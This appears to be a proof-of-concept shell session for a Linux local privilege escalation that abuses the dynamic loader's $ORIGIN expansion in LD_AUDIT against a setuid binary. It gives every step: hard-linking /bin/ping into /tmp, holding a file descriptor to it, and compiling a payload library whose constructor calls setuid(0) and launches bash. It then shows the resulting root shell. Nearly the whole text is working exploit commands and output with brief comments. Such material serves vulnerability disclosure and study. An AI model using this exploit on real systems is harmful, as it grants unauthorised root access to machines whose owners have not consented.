# Create a directory in /tmp that we control.
$ mkdir /tmp/exploit |
|
# Hard-link an suid binary into it, thus changing the directory that $ORIGIN resolves to.
$ ln /bin/ping /tmp/exploit/target |
|
# Open a file descriptor to the target binary (note: some users are surprised
# to learn that exec can be used to manipulate the redirections of the current
# shell when no command is given. This is what is happening below).
$ exec 3< /tmp/exploit/target |
|
# This descriptor should now be accessible via /proc. |
$ ls -l /proc/$$/fd/3 |
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* |
|
# Remove the directory created above.
$ rm -rf /tmp/exploit/ |
|
# The /proc link should still exist, but will now be marked as deleted.
$ ls -l /proc/$$/fd/3 |
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) |
|
# Replace the (now deleted) directory path with a payload DSO, thus making $ORIGIN a valid target for dlopen().
$ cat > payload.c |
void __attribute__((constructor)) init() |
{ |
setuid(0);
|
system("/bin/bash");
|
} |
^D |
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c |
$ ls -l /tmp/exploit |
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* |
|
# Now force the binary behind the /proc link to load $ORIGIN via LD_AUDIT. This relies on the
# loader expanding $ORIGIN in LD_AUDIT for a setuid program; a loader that refuses that for
# privileged programs does not reach the payload.
$ LD_AUDIT="/$ORIGIN" exec /proc/self/fd/3 |
sh-4.1# whoami |
root |
sh-4.1# id |
uid=0(root) gid=500(taviso) |